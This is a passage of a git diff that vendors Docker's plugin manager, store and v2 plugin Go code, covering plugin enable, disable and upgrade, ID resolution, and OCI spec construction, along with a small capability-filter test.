ioutil.ReadFile(p) + if err != nil { + return nil, errors.Wrapf(err, "error reading %v", p) + } + var plugin v2.Plugin + if err := json.Unmarshal(dt, &plugin); err != nil { + return nil, errors.Wrapf(err, "error decoding %v", p) + } + return &plugin, nil +} + +func (pm *Manager) save(p *v2.Plugin) error { + pluginJSON, err := json.Marshal(p) + if err != nil { + return errors.Wrap(err, "failed to marshal plugin json") + } + if err := ioutils.AtomicWriteFile(filepath.Join(pm.config.Root, p.GetID(), configFileName), pluginJSON, 0600); err != nil { + return errors.Wrap(err, "failed to write atomically plugin json") + } + return nil +} + +// GC cleans up unrefrenced blobs. This is recommended to run in a goroutine +func (pm *Manager) GC() { + pm.muGC.Lock() + defer pm.muGC.Unlock() + + whitelist := make(map[digest.Digest]struct{}) + for _, p := range pm.config.Store.GetAll() { + whitelist[p.Config] = struct{}{} + for _, b := range p.Blobsums { + whitelist[b] = struct{}{} + } + } + + pm.blobStore.gc(whitelist) +} + +type logHook struct{ id string } + +func (logHook) Levels() []logrus.Level { + return logrus.AllLevels +} + +func (l logHook) Fire(entry *logrus.Entry) error { + entry.Data = logrus.Fields{"plugin": l.id} + return nil +} + +func attachToLog(id string) func(libcontainerd.IOPipe) error { + return func(iop libcontainerd.IOPipe) error { + iop.Stdin.Close() + + logger := logrus.New() + logger.Hooks.Add(logHook{id}) + // TODO: cache writer per id + w := logger.Writer() + go func() { + io.Copy(w, iop.Stdout) + }() + go func() { + // TODO: update logrus and use logger.WriterLevel + io.Copy(w, iop.Stderr) + }() + return nil + } +} + +func validatePrivileges(requiredPrivileges, privileges types.PluginPrivileges) error { + // todo: make a better function that doesn't check order + if !reflect.DeepEqual(privileges, requiredPrivileges) { + return errors.New("incorrect privileges") + } + return nil +} + +func configToRootFS(c []byte) (*image.RootFS, error) { + var 
pluginConfig types.PluginConfig + if err := json.Unmarshal(c, &pluginConfig); err != nil { + return nil, err + } + // validation for empty rootfs is in distribution code + if pluginConfig.Rootfs == nil { + return nil, nil + } + + return rootFSFromPlugin(pluginConfig.Rootfs), nil +} + +func rootFSFromPlugin(pluginfs *types.PluginConfigRootfs) *image.RootFS { + rootFS := image.RootFS{ + Type: pluginfs.Type, + DiffIDs: make([]layer.DiffID, len(pluginfs.DiffIds)), + } + for i := range pluginfs.DiffIds { + rootFS.DiffIDs[i] = layer.DiffID(pluginfs.DiffIds[i]) + } + + return &rootFS +} diff --git a/vendor/github.com/docker/docker/plugin/manager_linux.go b/vendor/github.com/docker/docker/plugin/manager_linux.go new file mode 100644 index 0000000000..ad66616628 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_linux.go @@ -0,0 +1,284 @@ +// +build linux + +package plugin + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/daemon/initlayer" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/plugin/v2" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" +) + +func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { + p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs") + if p.IsEnabled() && !force { + return fmt.Errorf("plugin %s is already enabled", p.Name()) + } + spec, err := p.InitSpec(pm.config.ExecRoot) + if err != nil { + return err + } + + c.restart = true + c.exitChan = make(chan bool) + + pm.mu.Lock() + pm.cMap[p] = c + pm.mu.Unlock() + + var propRoot string + if p.PropagatedMount != "" { + propRoot = filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") + + if err := 
os.MkdirAll(propRoot, 0755); err != nil { + logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err) + } + + if err := mount.MakeRShared(propRoot); err != nil { + return errors.Wrap(err, "error setting up propagated mount dir") + } + + if err := mount.Mount(propRoot, p.PropagatedMount, "none", "rbind"); err != nil { + return errors.Wrap(err, "error creating mount for propagated mount") + } + } + + if err := initlayer.Setup(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName), 0, 0); err != nil { + return errors.WithStack(err) + } + + if err := pm.containerdClient.Create(p.GetID(), "", "", specs.Spec(*spec), attachToLog(p.GetID())); err != nil { + if p.PropagatedMount != "" { + if err := mount.Unmount(p.PropagatedMount); err != nil { + logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err) + } + if err := mount.Unmount(propRoot); err != nil { + logrus.Warnf("Could not unmount %s: %v", propRoot, err) + } + } + return errors.WithStack(err) + } + + return pm.pluginPostStart(p, c) +} + +func (pm *Manager) pluginPostStart(p *v2.Plugin, c *controller) error { + client, err := plugins.NewClientWithTimeout("unix://"+filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket()), nil, c.timeoutInSecs) + if err != nil { + c.restart = false + shutdownPlugin(p, c, pm.containerdClient) + return errors.WithStack(err) + } + + p.SetPClient(client) + pm.config.Store.SetState(p, true) + pm.config.Store.CallHandler(p) + + return pm.save(p) +} + +func (pm *Manager) restore(p *v2.Plugin) error { + if err := pm.containerdClient.Restore(p.GetID(), attachToLog(p.GetID())); err != nil { + return err + } + + if pm.config.LiveRestoreEnabled { + c := &controller{} + if pids, _ := pm.containerdClient.GetPidsForContainer(p.GetID()); len(pids) == 0 { + // plugin is not running, so follow normal startup procedure + return pm.enable(p, c, true) + } + + c.exitChan = make(chan bool) + c.restart = true + pm.mu.Lock() + pm.cMap[p] = c + pm.mu.Unlock() + 
return pm.pluginPostStart(p, c) + } + + return nil +} + +func shutdownPlugin(p *v2.Plugin, c *controller, containerdClient libcontainerd.Client) { + pluginID := p.GetID() + + err := containerdClient.Signal(pluginID, int(syscall.SIGTERM)) + if err != nil { + logrus.Errorf("Sending SIGTERM to plugin failed with error: %v", err) + } else { + select { + case <-c.exitChan: + logrus.Debug("Clean shutdown of plugin") + case <-time.After(time.Second * 10): + logrus.Debug("Force shutdown plugin") + if err := containerdClient.Signal(pluginID, int(syscall.SIGKILL)); err != nil { + logrus.Errorf("Sending SIGKILL to plugin failed with error: %v", err) + } + } + } +} + +func (pm *Manager) disable(p *v2.Plugin, c *controller) error { + if !p.IsEnabled() { + return fmt.Errorf("plugin %s is already disabled", p.Name()) + } + + c.restart = false + shutdownPlugin(p, c, pm.containerdClient) + pm.config.Store.SetState(p, false) + return pm.save(p) +} + +// Shutdown stops all plugins and called during daemon shutdown. 
+func (pm *Manager) Shutdown() { + plugins := pm.config.Store.GetAll() + for _, p := range plugins { + pm.mu.RLock() + c := pm.cMap[p] + pm.mu.RUnlock() + + if pm.config.LiveRestoreEnabled && p.IsEnabled() { + logrus.Debug("Plugin active when liveRestore is set, skipping shutdown") + continue + } + if pm.containerdClient != nil && p.IsEnabled() { + c.restart = false + shutdownPlugin(p, c, pm.containerdClient) + } + } +} + +func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobsums []digest.Digest, tmpRootFSDir string, privileges *types.PluginPrivileges) (err error) { + config, err := pm.setupNewPlugin(configDigest, blobsums, privileges) + if err != nil { + return err + } + + pdir := filepath.Join(pm.config.Root, p.PluginObj.ID) + orig := filepath.Join(pdir, "rootfs") + backup := orig + "-old" + if err := os.Rename(orig, backup); err != nil { + return err + } + + defer func() { + if err != nil { + if rmErr := os.RemoveAll(orig); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up after failed upgrade") + return + } + + if err := os.Rename(backup, orig); err != nil { + err = errors.Wrap(err, "error restoring old plugin root on upgrade failure") + } + if rmErr := os.RemoveAll(tmpRootFSDir); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithError(rmErr).WithField("plugin", p.Name()).Errorf("error cleaning up plugin upgrade dir: %s", tmpRootFSDir) + } + } else { + if rmErr := os.RemoveAll(backup); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up old plugin root after successful upgrade") + } + + p.Config = configDigest + p.Blobsums = blobsums + } + }() + + if err := os.Rename(tmpRootFSDir, orig); err != nil { + return errors.Wrap(err, "error upgrading") + } + + p.PluginObj.Config = config + err = pm.save(p) + return errors.Wrap(err, "error saving upgraded plugin config") +} + +func (pm *Manager) 
setupNewPlugin(configDigest digest.Digest, blobsums []digest.Digest, privileges *types.PluginPrivileges) (types.PluginConfig, error) { + configRC, err := pm.blobStore.Get(configDigest) + if err != nil { + return types.PluginConfig{}, err + } + defer configRC.Close() + + var config types.PluginConfig + dec := json.NewDecoder(configRC) + if err := dec.Decode(&config); err != nil { + return types.PluginConfig{}, errors.Wrapf(err, "failed to parse config") + } + if dec.More() { + return types.PluginConfig{}, errors.New("invalid config json") + } + + requiredPrivileges, err := computePrivileges(config) + if err != nil { + return types.PluginConfig{}, err + } + if privileges != nil { + if err := validatePrivileges(requiredPrivileges, *privileges); err != nil { + return types.PluginConfig{}, err + } + } + + return config, nil +} + +// createPlugin creates a new plugin. take lock before calling. +func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges) (p *v2.Plugin, err error) { + if err := pm.config.Store.validateName(name); err != nil { // todo: this check is wrong. 
remove store + return nil, err + } + + config, err := pm.setupNewPlugin(configDigest, blobsums, privileges) + if err != nil { + return nil, err + } + + p = &v2.Plugin{ + PluginObj: types.Plugin{ + Name: name, + ID: stringid.GenerateRandomID(), + Config: config, + }, + Config: configDigest, + Blobsums: blobsums, + } + p.InitEmptySettings() + + pdir := filepath.Join(pm.config.Root, p.PluginObj.ID) + if err := os.MkdirAll(pdir, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", pdir) + } + + defer func() { + if err != nil { + os.RemoveAll(pdir) + } + }() + + if err := os.Rename(rootFSDir, filepath.Join(pdir, rootFSFileName)); err != nil { + return nil, errors.Wrap(err, "failed to rename rootfs") + } + + if err := pm.save(p); err != nil { + return nil, err + } + + pm.config.Store.Add(p) // todo: remove + + return p, nil +} diff --git a/vendor/github.com/docker/docker/plugin/manager_solaris.go b/vendor/github.com/docker/docker/plugin/manager_solaris.go new file mode 100644 index 0000000000..72ccae72d3 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_solaris.go @@ -0,0 +1,28 @@ +package plugin + +import ( + "fmt" + + "github.com/docker/docker/plugin/v2" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { + return fmt.Errorf("Not implemented") +} + +func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) { + return nil, fmt.Errorf("Not implemented") +} + +func (pm *Manager) disable(p *v2.Plugin, c *controller) error { + return fmt.Errorf("Not implemented") +} + +func (pm *Manager) restore(p *v2.Plugin) error { + return fmt.Errorf("Not implemented") +} + +// Shutdown plugins +func (pm *Manager) Shutdown() { +} diff --git a/vendor/github.com/docker/docker/plugin/manager_windows.go b/vendor/github.com/docker/docker/plugin/manager_windows.go new file mode 100644 index 0000000000..4469a671f7 --- /dev/null +++ 
b/vendor/github.com/docker/docker/plugin/manager_windows.go @@ -0,0 +1,30 @@ +// +build windows + +package plugin + +import ( + "fmt" + + "github.com/docker/docker/plugin/v2" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { + return fmt.Errorf("Not implemented") +} + +func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) { + return nil, fmt.Errorf("Not implemented") +} + +func (pm *Manager) disable(p *v2.Plugin, c *controller) error { + return fmt.Errorf("Not implemented") +} + +func (pm *Manager) restore(p *v2.Plugin) error { + return fmt.Errorf("Not implemented") +} + +// Shutdown plugins +func (pm *Manager) Shutdown() { +} diff --git a/vendor/github.com/docker/docker/plugin/store.go b/vendor/github.com/docker/docker/plugin/store.go new file mode 100644 index 0000000000..b7a96a950a --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/store.go @@ -0,0 +1,263 @@ +package plugin + +import ( + "fmt" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/plugin/v2" + "github.com/docker/docker/reference" + "github.com/pkg/errors" +) + +/* allowV1PluginsFallback determines daemon's support for V1 plugins. + * When the time comes to remove support for V1 plugins, flipping + * this bool is all that will be needed. + */ +const allowV1PluginsFallback bool = true + +/* defaultAPIVersion is the version of the plugin API for volume, network, + IPAM and authz. This is a very stable API. When we update this API, then + pluginType should include a version. eg "networkdriver/2.0". +*/ +const defaultAPIVersion string = "1.0" + +// ErrNotFound indicates that a plugin was not found locally. 
+type ErrNotFound string + +func (name ErrNotFound) Error() string { return fmt.Sprintf("plugin %q not found", string(name)) } + +// ErrAmbiguous indicates that a plugin was not found locally. +type ErrAmbiguous string + +func (name ErrAmbiguous) Error() string { + return fmt.Sprintf("multiple plugins found for %q", string(name)) +} + +// GetV2Plugin retreives a plugin by name, id or partial ID. +func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) { + ps.RLock() + defer ps.RUnlock() + + id, err := ps.resolvePluginID(refOrID) + if err != nil { + return nil, err + } + + p, idOk := ps.plugins[id] + if !idOk { + return nil, errors.WithStack(ErrNotFound(id)) + } + + return p, nil +} + +// validateName returns error if name is already reserved. always call with lock and full name +func (ps *Store) validateName(name string) error { + for _, p := range ps.plugins { + if p.Name() == name { + return errors.Errorf("plugin %q already exists", name) + } + } + return nil +} + +// GetAll retreives all plugins. +func (ps *Store) GetAll() map[string]*v2.Plugin { + ps.RLock() + defer ps.RUnlock() + return ps.plugins +} + +// SetAll initialized plugins during daemon restore. +func (ps *Store) SetAll(plugins map[string]*v2.Plugin) { + ps.Lock() + defer ps.Unlock() + ps.plugins = plugins +} + +func (ps *Store) getAllByCap(capability string) []plugingetter.CompatPlugin { + ps.RLock() + defer ps.RUnlock() + + result := make([]plugingetter.CompatPlugin, 0, 1) + for _, p := range ps.plugins { + if p.IsEnabled() { + if _, err := p.FilterByCap(capability); err == nil { + result = append(result, p) + } + } + } + return result +} + +// SetState sets the active state of the plugin and updates plugindb. +func (ps *Store) SetState(p *v2.Plugin, state bool) { + ps.Lock() + defer ps.Unlock() + + p.PluginObj.Enabled = state +} + +// Add adds a plugin to memory and plugindb. +// An error will be returned if there is a collision. 
+func (ps *Store) Add(p *v2.Plugin) error { + ps.Lock() + defer ps.Unlock() + + if v, exist := ps.plugins[p.GetID()]; exist { + return fmt.Errorf("plugin %q has the same ID %s as %q", p.Name(), p.GetID(), v.Name()) + } + ps.plugins[p.GetID()] = p + return nil +} + +// Remove removes a plugin from memory and plugindb. +func (ps *Store) Remove(p *v2.Plugin) { + ps.Lock() + delete(ps.plugins, p.GetID()) + ps.Unlock() +} + +// Get returns an enabled plugin matching the given name and capability. +func (ps *Store) Get(name, capability string, mode int) (plugingetter.CompatPlugin, error) { + var ( + p *v2.Plugin + err error + ) + + // Lookup using new model. + if ps != nil { + p, err = ps.GetV2Plugin(name) + if err == nil { + p.AddRefCount(mode) + if p.IsEnabled() { + return p.FilterByCap(capability) + } + // Plugin was found but it is disabled, so we should not fall back to legacy plugins + // but we should error out right away + return nil, ErrNotFound(name) + } + if _, ok := errors.Cause(err).(ErrNotFound); !ok { + return nil, err + } + } + + // Lookup using legacy model. + if allowV1PluginsFallback { + p, err := plugins.Get(name, capability) + if err != nil { + return nil, fmt.Errorf("legacy plugin: %v", err) + } + return p, nil + } + + return nil, err +} + +// GetAllManagedPluginsByCap returns a list of managed plugins matching the given capability. +func (ps *Store) GetAllManagedPluginsByCap(capability string) []plugingetter.CompatPlugin { + return ps.getAllByCap(capability) +} + +// GetAllByCap returns a list of enabled plugins matching the given capability. +func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, error) { + result := make([]plugingetter.CompatPlugin, 0, 1) + + /* Daemon start always calls plugin.Init thereby initializing a store. + * So store on experimental builds can never be nil, even while + * handling legacy plugins. 
However, there are legacy plugin unit + * tests where the volume subsystem directly talks with the plugin, + * bypassing the daemon. For such tests, this check is necessary. + */ + if ps != nil { + ps.RLock() + result = ps.getAllByCap(capability) + ps.RUnlock() + } + + // Lookup with legacy model + if allowV1PluginsFallback { + pl, err := plugins.GetAll(capability) + if err != nil { + return nil, fmt.Errorf("legacy plugin: %v", err) + } + for _, p := range pl { + result = append(result, p) + } + } + return result, nil +} + +// Handle sets a callback for a given capability. It is only used by network +// and ipam drivers during plugin registration. The callback registers the +// driver with the subsystem (network, ipam). +func (ps *Store) Handle(capability string, callback func(string, *plugins.Client)) { + pluginType := fmt.Sprintf("docker.%s/%s", strings.ToLower(capability), defaultAPIVersion) + + // Register callback with new plugin model. + ps.Lock() + handlers, ok := ps.handlers[pluginType] + if !ok { + handlers = []func(string, *plugins.Client){} + } + handlers = append(handlers, callback) + ps.handlers[pluginType] = handlers + ps.Unlock() + + // Register callback with legacy plugin model. + if allowV1PluginsFallback { + plugins.Handle(capability, callback) + } +} + +// CallHandler calls the registered callback. It is invoked during plugin enable. 
+func (ps *Store) CallHandler(p *v2.Plugin) { + for _, typ := range p.GetTypes() { + for _, handler := range ps.handlers[typ.String()] { + handler(p.Name(), p.Client()) + } + } +} + +func (ps *Store) resolvePluginID(idOrName string) (string, error) { + ps.RLock() // todo: fix + defer ps.RUnlock() + + if validFullID.MatchString(idOrName) { + return idOrName, nil + } + + ref, err := reference.ParseNamed(idOrName) + if err != nil { + return "", errors.WithStack(ErrNotFound(idOrName)) + } + if _, ok := ref.(reference.Canonical); ok { + logrus.Warnf("canonical references cannot be resolved: %v", ref.String()) + return "", errors.WithStack(ErrNotFound(idOrName)) + } + + fullRef := reference.WithDefaultTag(ref) + + for _, p := range ps.plugins { + if p.PluginObj.Name == fullRef.String() { + return p.PluginObj.ID, nil + } + } + + var found *v2.Plugin + for id, p := range ps.plugins { // this can be optimized + if strings.HasPrefix(id, idOrName) { + if found != nil { + return "", errors.WithStack(ErrAmbiguous(idOrName)) + } + found = p + } + } + if found == nil { + return "", errors.WithStack(ErrNotFound(idOrName)) + } + return found.PluginObj.ID, nil +} diff --git a/vendor/github.com/docker/docker/plugin/store_test.go b/vendor/github.com/docker/docker/plugin/store_test.go new file mode 100644 index 0000000000..6b1f6a9418 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/store_test.go @@ -0,0 +1,33 @@ +package plugin + +import ( + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/plugin/v2" +) + +func TestFilterByCapNeg(t *testing.T) { + p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} + iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"} + i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}} + p.PluginObj.Config.Interface = i + + _, err := p.FilterByCap("foobar") + if err == nil { + t.Fatalf("expected inadequate error, got %v", err) + } +} + +func TestFilterByCapPos(t 
*testing.T) { + p := v2.Plugin{PluginObj: types.Plugin{Name: "test:latest"}} + + iType := types.PluginInterfaceType{"volumedriver", "docker", "1.0"} + i := types.PluginConfigInterface{"plugins.sock", []types.PluginInterfaceType{iType}} + p.PluginObj.Config.Interface = i + + _, err := p.FilterByCap("volumedriver") + if err != nil { + t.Fatalf("expected no error, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin.go b/vendor/github.com/docker/docker/plugin/v2/plugin.go new file mode 100644 index 0000000000..93b489a14b --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/plugin.go @@ -0,0 +1,244 @@ +package v2 + +import ( + "fmt" + "strings" + "sync" + + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" +) + +// Plugin represents an individual plugin. +type Plugin struct { + mu sync.RWMutex + PluginObj types.Plugin `json:"plugin"` // todo: embed struct + pClient *plugins.Client + refCount int + PropagatedMount string // TODO: make private + Rootfs string // TODO: make private + + Config digest.Digest + Blobsums []digest.Digest +} + +const defaultPluginRuntimeDestination = "/run/docker/plugins" + +// ErrInadequateCapability indicates that the plugin did not have the requested capability. +type ErrInadequateCapability struct { + cap string +} + +func (e ErrInadequateCapability) Error() string { + return fmt.Sprintf("plugin does not provide %q capability", e.cap) +} + +// BasePath returns the path to which all paths returned by the plugin are relative to. +// For Plugin objects this returns the host path of the plugin container's rootfs. +func (p *Plugin) BasePath() string { + return p.Rootfs +} + +// Client returns the plugin client. +func (p *Plugin) Client() *plugins.Client { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.pClient +} + +// SetPClient set the plugin client. 
+func (p *Plugin) SetPClient(client *plugins.Client) { + p.mu.Lock() + defer p.mu.Unlock() + + p.pClient = client +} + +// IsV1 returns true for V1 plugins and false otherwise. +func (p *Plugin) IsV1() bool { + return false +} + +// Name returns the plugin name. +func (p *Plugin) Name() string { + return p.PluginObj.Name +} + +// FilterByCap query the plugin for a given capability. +func (p *Plugin) FilterByCap(capability string) (*Plugin, error) { + capability = strings.ToLower(capability) + for _, typ := range p.PluginObj.Config.Interface.Types { + if typ.Capability == capability && typ.Prefix == "docker" { + return p, nil + } + } + return nil, ErrInadequateCapability{capability} +} + +// InitEmptySettings initializes empty settings for a plugin. +func (p *Plugin) InitEmptySettings() { + p.PluginObj.Settings.Mounts = make([]types.PluginMount, len(p.PluginObj.Config.Mounts)) + copy(p.PluginObj.Settings.Mounts, p.PluginObj.Config.Mounts) + p.PluginObj.Settings.Devices = make([]types.PluginDevice, len(p.PluginObj.Config.Linux.Devices)) + copy(p.PluginObj.Settings.Devices, p.PluginObj.Config.Linux.Devices) + p.PluginObj.Settings.Env = make([]string, 0, len(p.PluginObj.Config.Env)) + for _, env := range p.PluginObj.Config.Env { + if env.Value != nil { + p.PluginObj.Settings.Env = append(p.PluginObj.Settings.Env, fmt.Sprintf("%s=%s", env.Name, *env.Value)) + } + } + p.PluginObj.Settings.Args = make([]string, len(p.PluginObj.Config.Args.Value)) + copy(p.PluginObj.Settings.Args, p.PluginObj.Config.Args.Value) +} + +// Set is used to pass arguments to the plugin. +func (p *Plugin) Set(args []string) error { + p.mu.Lock() + defer p.mu.Unlock() + + if p.PluginObj.Enabled { + return fmt.Errorf("cannot set on an active plugin, disable plugin before setting") + } + + sets, err := newSettables(args) + if err != nil { + return err + } + + // TODO(vieux): lots of code duplication here, needs to be refactored. 
+ +next: + for _, s := range sets { + // range over all the envs in the config + for _, env := range p.PluginObj.Config.Env { + // found the env in the config + if env.Name == s.name { + // is it settable ? + if ok, err := s.isSettable(allowedSettableFieldsEnv, env.Settable); err != nil { + return err + } else if !ok { + return fmt.Errorf("%q is not settable", s.prettyName()) + } + // is it, so lets update the settings in memory + updateSettingsEnv(&p.PluginObj.Settings.Env, &s) + continue next + } + } + + // range over all the mounts in the config + for _, mount := range p.PluginObj.Config.Mounts { + // found the mount in the config + if mount.Name == s.name { + // is it settable ? + if ok, err := s.isSettable(allowedSettableFieldsMounts, mount.Settable); err != nil { + return err + } else if !ok { + return fmt.Errorf("%q is not settable", s.prettyName()) + } + + // it is, so lets update the settings in memory + *mount.Source = s.value + continue next + } + } + + // range over all the devices in the config + for _, device := range p.PluginObj.Config.Linux.Devices { + // found the device in the config + if device.Name == s.name { + // is it settable ? + if ok, err := s.isSettable(allowedSettableFieldsDevices, device.Settable); err != nil { + return err + } else if !ok { + return fmt.Errorf("%q is not settable", s.prettyName()) + } + + // it is, so lets update the settings in memory + *device.Path = s.value + continue next + } + } + + // found the name in the config + if p.PluginObj.Config.Args.Name == s.name { + // is it settable ? 
+ if ok, err := s.isSettable(allowedSettableFieldsArgs, p.PluginObj.Config.Args.Settable); err != nil { + return err + } else if !ok { + return fmt.Errorf("%q is not settable", s.prettyName()) + } + + // it is, so lets update the settings in memory + p.PluginObj.Settings.Args = strings.Split(s.value, " ") + continue next + } + + return fmt.Errorf("setting %q not found in the plugin configuration", s.name) + } + + return nil +} + +// IsEnabled returns the active state of the plugin. +func (p *Plugin) IsEnabled() bool { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.PluginObj.Enabled +} + +// GetID returns the plugin's ID. +func (p *Plugin) GetID() string { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.PluginObj.ID +} + +// GetSocket returns the plugin socket. +func (p *Plugin) GetSocket() string { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.PluginObj.Config.Interface.Socket +} + +// GetTypes returns the interface types of a plugin. +func (p *Plugin) GetTypes() []types.PluginInterfaceType { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.PluginObj.Config.Interface.Types +} + +// GetRefCount returns the reference count. +func (p *Plugin) GetRefCount() int { + p.mu.RLock() + defer p.mu.RUnlock() + + return p.refCount +} + +// AddRefCount adds to reference count. +func (p *Plugin) AddRefCount(count int) { + p.mu.Lock() + defer p.mu.Unlock() + + p.refCount += count +} + +// Acquire increments the plugin's reference count +// This should be followed up by `Release()` when the plugin is no longer in use. +func (p *Plugin) Acquire() { + p.AddRefCount(plugingetter.ACQUIRE) +} + +// Release decrements the plugin's reference count +// This should only be called when the plugin is no longer in use, e.g. 
with +// via `Acquire()` or getter.Get("name", "type", plugingetter.ACQUIRE) +func (p *Plugin) Release() { + p.AddRefCount(plugingetter.RELEASE) +} diff --git a/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go new file mode 100644 index 0000000000..e980e7f29a --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/v2/plugin_linux.go @@ -0,0 +1,121 @@ +// +build linux + +package v2 + +import ( + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/system" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" +) + +// InitSpec creates an OCI spec from the plugin's config. +func (p *Plugin) InitSpec(execRoot string) (*specs.Spec, error) { + s := oci.DefaultSpec() + s.Root = specs.Root{ + Path: p.Rootfs, + Readonly: false, // TODO: all plugins should be readonly? settable in config? + } + + userMounts := make(map[string]struct{}, len(p.PluginObj.Settings.Mounts)) + for _, m := range p.PluginObj.Settings.Mounts { + userMounts[m.Destination] = struct{}{} + } + + execRoot = filepath.Join(execRoot, p.PluginObj.ID) + if err := os.MkdirAll(execRoot, 0700); err != nil { + return nil, errors.WithStack(err) + } + + mounts := append(p.PluginObj.Config.Mounts, types.PluginMount{ + Source: &execRoot, + Destination: defaultPluginRuntimeDestination, + Type: "bind", + Options: []string{"rbind", "rshared"}, + }) + + if p.PluginObj.Config.Network.Type != "" { + // TODO: if net == bridge, use libnetwork controller to create a new plugin-specific bridge, bind mount /etc/hosts and /etc/resolv.conf look at the docker code (allocateNetwork, initialize) + if p.PluginObj.Config.Network.Type == "host" { + oci.RemoveNamespace(&s, specs.NamespaceType("network")) + } + etcHosts := "/etc/hosts" + resolvConf := "/etc/resolv.conf" + mounts = append(mounts, + types.PluginMount{ + Source: &etcHosts, + Destination: 
etcHosts, + Type: "bind", + Options: []string{"rbind", "ro"}, + }, + types.PluginMount{ + Source: &resolvConf, + Destination: resolvConf, + Type: "bind", + Options: []string{"rbind", "ro"}, + }) + } + + for _, mnt := range mounts { + m := specs.Mount{ + Destination: mnt.Destination, + Type: mnt.Type, + Options: mnt.Options, + } + if mnt.Source == nil { + return nil, errors.New("mount source is not specified") + } + m.Source = *mnt.Source + s.Mounts = append(s.Mounts, m) + } + + for i, m := range s.Mounts { + if strings.HasPrefix(m.Destination, "/dev/") { + if _, ok := userMounts[m.Destination]; ok { + s.Mounts = append(s.Mounts[:i], s.Mounts[i+1:]...) + } + } + } + + if p.PluginObj.Config.PropagatedMount != "" { + p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) + s.Linux.RootfsPropagation = "rshared" + } + + if p.PluginObj.Config.Linux.AllowAllDevices { + rwm := "rwm" + s.Linux.Resources.Devices = []specs.DeviceCgroup{{Allow: true, Access: &rwm}} + } + for _, dev := range p.PluginObj.Settings.Devices { + path := *dev.Path + d, dPermissions, err := oci.DevicesFromPath(path, path, "rwm") + if err != nil { + return nil, errors.WithStack(err) + } + s.Linux.Devices = append(s.Linux.Devices, d...) + s.Linux.Resources.Devices = append(s.Linux.Resources.Devices, dPermissions...) + } + + envs := make([]string, 1, len(p.PluginObj.Settings.Env)+1) + envs[0] = "PATH=" + system.DefaultPathEnv + envs = append(envs, p.PluginObj.Settings.Env...) + + args := append(p.PluginObj.Config.Entrypoint, p.PluginObj.Settings.Args...) + cwd := p.PluginObj.Config.WorkDir + if len(cwd) == 0 { + cwd = "/" + } + s.Process.Terminal = false + s.Process.Args = args + s.Process.Cwd = cwd + s.Process.Env = envs + + s.Process.Capabilities = append(s.Process.Capabilities, p.PluginObj.Config.Linux.Capabilities...) 
